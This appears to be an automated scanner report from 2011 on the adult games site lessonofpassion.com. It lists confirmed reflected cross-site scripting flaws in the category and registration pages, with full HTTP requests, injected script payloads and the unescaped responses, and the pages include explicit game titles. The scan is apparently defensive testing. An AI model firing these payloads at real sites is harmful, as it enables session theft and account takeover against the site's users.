src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://outcastacademy.com/index.php?targeo=lopvert" target = "_blank"><img src="lopsalesforce/outcastacademy_vert_160x600.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big">adventure games</div> <div id="glinks"> <p><a href="lop_games.php?mygame=Seductive RPG" title="Seductive RPG"><img src="imago/sedrpg.jpg" class = "game" width="157" height="112" ><span class = "def">Seductive RPG</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High school romance" title="High school romance"><img src="imago/highschoolromance.jpg" class = "game" width="157" height="112" ><span class = "def">High school romance</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny teacher" title="Horny teacher"><img src="imago/hornyteacher.jpg" class = "game" width="157" height="112" ><span class = "def">Horny teacher</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Maid" title="Horny Maid"><img src="imago/hornymaid.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Maid</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Olympic Adventures" title="Olympic Adventures"><img src="imago/olympic.jpg" class = "game" width="157" height="112" ><span class = "def">Olympic Adventures</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=High Tail Hall" title="High Tail Hall"><img src="imago/fur.jpg" class = "game" width="157" height="112" ><span class = "def">High Tail Hall</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Meet`N`Fuck Secret Agent" title="Meet`N`Fuck Secret Agent"><img src="imago/secretagent.jpg" class = "game" width="157" height="112" ><span class = "def">Meet`N`Fuck Secret Agent</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Afternoon: 1st Time" title="Horny Afternoon: 1st Time"><img src="imago/hornyafternoon_firsttime_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Afternoon: 1st Time</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Afternoon 3" title="Horny Afternoon 3"><img src="imago/hornyafternoon3_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Afternoon 3</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Uniform sex - sexy spies" title="Uniform sex - sexy spies"><img src="imago/uniform.jpg" class = "game" width="157" height="112" ><span class = "def">Uniform sex - sexy spies</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Beach fuck with Erin" title="Beach fuck with Erin"><img src="imago/beachfuck.jpg" class = "game" width="157" height="112" ><span class = "def">Beach fuck with Erin</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Porno Night" title="Porno Night"><img src="imago/pornonights.jpg" class = "game" width="157" height="112" ><span class = "def">Porno Night</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Passion Hotel" title="Passion Hotel"><img src="imago/photel.jpg" class = "game" width="157" height="112" ><span class = "def">Passion Hotel</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Holiday Trip" title="Holiday Trip"><img src="imago/holidaytrip_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Holiday Trip</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Spy Zina" title="Spy Zina"><img src="imago/spyzina.jpg" class = "game" width="157" height="112" ><span class = "def">Spy Zina</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Christmas Trip" title="Christmas Trip"><img src="imago/christmastrip_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Christmas Trip</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Another Special Afternoon" title="Another Special Afternoon"><img src="imago/another_afternoon_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Another Special Afternoon</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Horny Afternoon" title="Horny Afternoon"><img src="imago/hornyafternoon_thumb.jpg" class = "game" width="157" height="112" ><span class = "def">Horny Afternoon</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Forced Strip - Up The Wahzoo" title="Forced Strip - Up The Wahzoo"><img src="imago/whazoo.jpg" class = "game" width="157" height="112" ><span class = "def">Forced Strip - Up The Wahzoo</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <div id="glinks"> <p><a href="lop_games.php?mygame=Summer session" title="Summer session"><img src="imago/ssession.jpg" class = "game" width="157" height="112" ><span class = "def">Summer session</span><span class = "em">Adventure</span><br /><span class = "gfxhot"></span> </a></p> </div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x000274)</script>&category=adventure"><strong>PREVIOUS</strong></a> &nbsp; <a href="?offset=0&id=\'\"--></style></script><script>netsparker(0x000274)</script>&category=adventure" >1</a> &nbsp; <strong>2</strong>&nbsp; <a href="?offset=40&id=\'\"--></style></script><script>netsparker(0x000274)</script>&category=adventure" >3</a> &nbsp; <a href="?offset=60&id=\'\"--></style></script><script>netsparker(0x000274)</script>&category=adventure" >4</a> &nbsp; <a href="?offset=40&id=\'\"--></style></script><script>netsparker(0x000274)</script>&category=adventure"><strong>NEXT</strong></a><p> </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /games_category.php

/games_category.php CONFIRMED

http://www.lessonofpassion.com/games_category.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
offset GET 20
id GET 3
category GET '"--></style></script><script>alert(0x00027B)</script>

Request

GET /games_category.php?offset=20&id=3&category='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00027B)%3C/script%3E HTTP/1.1
Referer: http://www.lessonofpassion.com/games_category.php?type=category&category=adventure
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Accept-Encoding: gzip, deflate,gzip, deflate
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:01:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2073
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - \'\"--></style></script><script>netsparker(0x00027B)</script> erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">%27<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.flashforadults.com/?t=110138,1,66,0" target = "_blank"><img src="lopsalesforce/vert_ffa.jpg" border="0"></a></center></div><div id="sitecontent"> <div class="big">\'\"--></style></script><script>netsparker(0x00027B)</script> games</div> <center><div class="clearfix"> </div><center><a href="?offset=0&id=3&category=\'\"--></style></script><script>netsparker(0x00027B)</script>"><strong>PREVIOUS</strong></a> &nbsp; </center></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser

Parameters

Parameter Type Value
type GET register
country GET AF
stage GET adduser
stage POST adduser
usernamex POST '"--></style></script><script>alert(0x00038D)</script>
passwordx POST 3
password2x POST 3
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register&country=AF&stage=adduser HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Content-Length: 177
Accept-Encoding: gzip, deflate

stage=adduser&usernamex='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00038D)%3c%2fscript%3e&passwordx=3&password2x=3&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:02:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2157
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dgirlfriends.com/?t=110138,1,53,0" target = "_blank"><img src="lopsalesforce/vert_3dgf.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">\'\"--></style></script><script>netsparker(0x00038D)</script>, welcome to Lesson of Passion CLUB!</span><br /><br />Your account with following data have been created.<br /><br />USERNAME: <strong>\'\"--></style></script><script>netsparker(0x00038D)</script></strong><br />PASSWORD: <strong>3</strong><br /><br />Please LOGIN and start your adventure.<br /><br />We wish you best luck.<br />LOP TEAM<br /></div></div><div id="footer"> <div id="frame"><div id="contentleft"> </div><div id="contentcenter"> <strong>WARNING: This website contains explicit adult material.</strong> You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. </div> <div id="contentright"> <span class = "regular">Important links:<br /><br />> <a href="index.php">Home page</a><br />> <a href="http://lessonofpassion.com/support/index.php">Contact form</a><br /><br />All rights reserverd<br />Copyright © 2010 <br /></div></div> </div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-2399441-3";urchinTracker();</script></body></html>
- /user.php

/user.php CONFIRMED

http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser

Parameters

Parameter Type Value
type GET register
country GET AF
stage GET adduser
stage POST adduser
usernamex POST Ronald Smith
passwordx POST '"--></style></script><script>alert(0x00038E)</script>
password2x POST 3
emailx POST netsparker@example.com
country POST AF

Request

POST /user.php?type=register&country=AF&stage=adduser HTTP/1.1
Referer: http://www.lessonofpassion.com/user.php?type=register&country=AF&stage=adduser
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.lessonofpassion.com
Cookie: PHPSESSID=dfce1a506c315a7a092e0c4bd0736d06
Content-Length: 188
Accept-Encoding: gzip, deflate

stage=adduser&usernamex=Ronald+Smith&passwordx='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00038E)%3c%2fscript%3e&password2x=3&emailx=netsparker%40example.com&country=AF

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:02:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 4654
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Lesson of Passion - erotic flash games</title><META name="Description" content="Official Lesson of Passion website.Presented games features:chat, kiss and have sex with new girls, featuring Aria Giovanni, Anita Dark, Nicole Sheridian, Lucia Tovar Crissy Moran and more dress-up: buy new clothes such as tops, skirts, lingerie, shoes and try everything in various combinations on Aria select your character from 4 available profiles: sportsman, technician, businessman and heartbreaker become a jury of a beauty contest remodeled meetings with Aria brand new sex scenes bang a hooker or purchase yourself a lovedoll specially selected music form newgrounds audio portal and more "><META name="Keywords" content="lesson of passion, lop, erotic flash, games, lop, black edition, lesson of passion 2, leonizer, mobile games, mobile, aria giovanni"> <meta name="robots" content="all"><style type="text/css"><link rel="shortcut icon" href="/favicon.ico"></style><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><!--body { background: #000000 url(back.jpg) no-repeat center top; margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--><link href="lop_style.css" rel="stylesheet" type="text/css"></head><body> <center><span class = "regular"><div id="site"> <div id="siteleft"> <a href="index.php" id = "logo"><img src="loplogo.png" border ="0" /></a><div class="clearfix"> </div></div><div id="sitecontent2"> <span class = "headx">Ronald Smith<br /></span>&nbsp;&nbsp;<img src="avatar_01.jpg" border ="0" class = "avatar"/><br />EXP: 0 | <a href="user.php" class = "po">YOUR ACCOUNT</a> | <a href="user.php?type=logout" class = "po">LOGOUT</a><br /></div><div class="clearfix"> </div><div class="clearfix"> </div><div id="siteleft"> <span class = "master">Game collections</span><br /><br /><a href="games_dev.php?type=category&category=lop">Lesson of Passion games</a><br /><a href="games_dev.php?type=category&category=mnf">Meet and Fuck games</a><br /><a href="games_dev.php?type=category&category=shark">Shark`s Lagoon games</a><br /><a href="games_dev.php?type=category&category=shg">Sex Hot Games games</a><br /><br /><br /><span class = "master">Game categories</span><br /><br /><a href="games_best.php">Best games</a><br /><a href="games_new.php">New games</a><br /><a href="games_category.php?type=category&category=dating">Dating games</a><br /><a href="games_category.php?type=category&category=adventure">Adventure games</a><br /><a href="games_category.php?type=category&category=logical">Logical games</a><br /><a href="games_category.php?type=category&category=tease">Tease games</a><br /><a href="games_category.php?type=category&category=arcade">Arcade games</a><br /><br /><span class = "master">Our other websites</span><br /><br /><a href="http://www.playforceone.com" target = "_blank">Play Force One</a><br /><a href="http://www.sexizu.com" target = "_blank">Sexizu</a><br /><br /><br /> <center><a href="http://www.3dadultcomics.com/?t=110138,1,4,1" target = "_blank"><img src="lopsalesforce/vert_3dac.jpg" border="0"></a></center></div><div id="sitecontent"> <span class="big">New Player registration</span><br /><br />Registration ERROR: Your password is different that password confirmation<br /><br /><FORM METHOD=POST><INPUT TYPE="hidden" NAME="stage" VALUE="adduser"><B>Username</B> <br /><INPUT TYPE="text" NAME="usernamex" SIZE=20 class="form" value = "Ronald Smith"><br /><br /><B>Password</B> <br /><INPUT TYPE="text" NAME="passwordx" SIZE=20 class="form" value = "\'\"--></style></script><script>netsparker(0x00038E)</script>"><br /><br /><B>Password confirmation</B> <br /><INPUT TYPE="text" NAME="password2x" SIZE=20 class="form" value = "3"><br /><br /><B>E-mail</B> <br /><INPUT TYPE="text" NAME="emailx" SIZE=20 class="form" value = "netsparker@example.com"><br /><br /><B>Country</B> <br /><select name="country"> <option value="AF">Afghanistan</option> <option value="AL">Albania</option> <option value="DZ">Algeria</option> <option value="AS">American Samoa</option> <option value="AD">Andorra</option> <option value="AO">Angola</option> <option value="AI">Anguilla</option> <option value="AG">Antigua And Barbuda</option> <option value="AR">Argentina</option> <option value="AM">Armenia</option> <option value="AW">Aruba</option> <option value="X1">Ascension</option> <option value="AU">Australia</option> <option value="AT">Austria</option> <option value="AZ">Azerbaijan</option> <option value="X2">Azores</option> <option value="BS">Bahamas</option> <option value="BH">Bahrain</option> <option value="BD">Bangladesh</option> <option value="BB">Barbados</option> <option value="BY">Belarus</option> <option value="BE">Belgium</option> <option value="BZ">Belize</option> <option value="BJ">Benin</option> <option value="BM">Bermuda</option> <option value="BT">Bhutan</option> <option value="BO">Bolivia</option> <option value="X3">Bophuthatswana</option> <option value="BA">Bosnia-Hercegovina</option> <option value="BW">Botswana</option> <option value="BR">Brazil</option> <option value="VG">British Virgin Islands</option> <option value="BN">Brunei</option> <option value="BG">Bulgaria</option> <option value="BF">Burkina Faso</option> <option value="BI">Burundi</option> <option value="CM">Cameroon</option> <option value="CA">Canada</option> <option value="CV">Cape Verde</option> <option value="KY">Cayman Islands</option> <option value="CF">Central African Republic</option> <option value="TD">Chad</option> <option value="X6">Channel Islands</option> <option value="CL">Chile</option> <option value="CN">China</option> <option value="CO">Colombia</option> <option value="KM">Comoros</option> <option value="CG">Congo</option> <option value="CK">Cook Islands</option> <option value="CR">Costa Rica</option> <option value="HR">Croatia</option> <option value="CU">Cuba</option> <option value="CY">Cyprus</option> <option value="CZ">Czech Republic</option> <option value="CS">Czechoslovakia</option> <option value="DK">Denmark</option> <option value="DJ">Djibouti</option> <option value="DM">Dominica</option> <option value="DO">Dominican Republic</option> <option value="EC">Ecuador</option> <option value="EG">Egypt</option> <option value="SV">El Salvador</option> <option value="X4">England</option> <option value="GQ">Equatorial Guinea</option> <option value="ER">Eritrea</option> <option value="EZ">Espana</option> <option value="EE">Estonia</option> <option value="ET">Ethiopia</option> <option value="FK">Falkland Islands</option> <option value="FO">Faroe Islands</option> <option value="FJ">Fiji</option> <option value="FI">Finland</option> <option value="FR">France</option> <option value="GF">French Guiana</option> <option value="PF">French Polynesia</option> <option value="X5">French West Indies</option> <option value="GA">Gabon</option> <option value="GM">Gambia</option> <option value="DE">Germany</option> <option value="GE">Georgia, Republic Of</option> <option value="GH">Ghana</option> <option value="GI">Gibraltar</option> <option value="GR">Greece</option> <option value="GL">Greenland</option> <option value="GD">Grenada</option> <option value="GP">Guadeloupe</option> <option value="GU">Guam</option> <option value="GT">Guatemala</option> <option value="GN">Guinea</option> <option value="GW">Guinea-Bissau</option> <option value="GY">Guyana</option> <option value="HT">Haiti</option> <option value="HN">Honduras</option> <option value="HK">Hong Kong</option> <option value="HU">Hungary</option> <option value="IS">Iceland</option> <option value="IN">India</option> <option value="ID">Indonesia</option> <option value="IR">Iran</option> <option value="IQ">Iraq</option> <option value="X7">Isle Of Man</option> <option value="IL">Israel</option> <option value="IT">Italy</option> <option value="CI">Ivory Coast</option> <option value="JM">Jamaica</option> <option value="JP">Japan</option> <option value="X8">Jersey</option> <option value="JO">Jordan</option> <option value="X9">Kampuchea</option> <option value="KZ">Kazakhstan</option> <option value="KE">Kenya</option> <option value="KI">Kiribati</option> <option value="KW">Kuwait</option> <option value="KG">Kyrgyzstan</option> <option value="LA">Laos</option> <option value="LV">Latvia</option> <option value="LB">Lebanon</option> <option value="LS">Lesotho</option> <option value="LR">Liberia</option> <option value="LY">Libya</option> <option value="LI">Liechtenstein</option> <option value="LT">Lithuania</option> <option value="LU">Luxembourg</option> <option value="MO">Macao</option> <option value="MK">Macedonia</option> <option value="MG">Madagascar</option> <option value="XA">Madeira Islands</option> <option value="MW">Malawi</option> <option value="MY">Malaysia</option> <option value="MV">Maldives</option> <option value="ML">Mali</option> <option value="MT">Malta</option> <option value="MH">Marshall Islands</option> <option value="MQ">Martinique</option> <option value="MR">Mauritania</option> <option value="MU">Mauritius</option> <option value="YT">Mayotte</option> <option value="MX">Mexico</option> <option value="MD">Moldova</option> <option value="MC">Monaco</option> <option value="MN">Mongolia</option> <option value="XB">Montenegro</option> <option value="MS">Montserrat</option> <option value="MA">Morocco</option> <option value="MZ">Mozambique</option> <option value="XD">Muscat And Oman</option> <option value="NA">Namibia</option> <option value="NR">Nauru</option> <option value="NP">Nepal</option> <option value="NL">Netherlands</option> <option value="AN">Netherlands Antilles</option> <option value="NC">New Caledonia</option> <option value="NZ">New Zealand</option> <option value="NI">Nicaragua</option> <option value="NE">Niger</option> <option value="NG">Nigeria</option> <option value="NU">Niue</option> <option value="KP">North Korea</option> <option value="NO">Norway</option> <option value="OM">Oman</option> <option value="PK">Pakistan</option> <option value="PA">Panama</option> <option value="PG">Papua New Guinea</option> <option value="PY">Paraguay</option> <option value="PE">Peru</option> <option value="PH">Philippines</option> <option value="PN">Pitcairn Islands</option> <option value="PL">Poland</option> <option value="PT">Portugal</option> <option value="QA">Qatar</option> <option value="IE">Republic of Ireland</option> <option value="RE">Reunion</option> <option value="RO">Romania</option> <option value="RU">Russia</option> <option value="RW">Rwanda</option> <option value="KN">Saint Christopher-Nevis</option> <option value="SH">Saint Helena</option> <option value="LC">Saint Lucia</option> <option value="PM">Saint Pierre And Miquelon</option> <option value="VC">Saint Vincent</option> <option value="SM">San Marino</option> 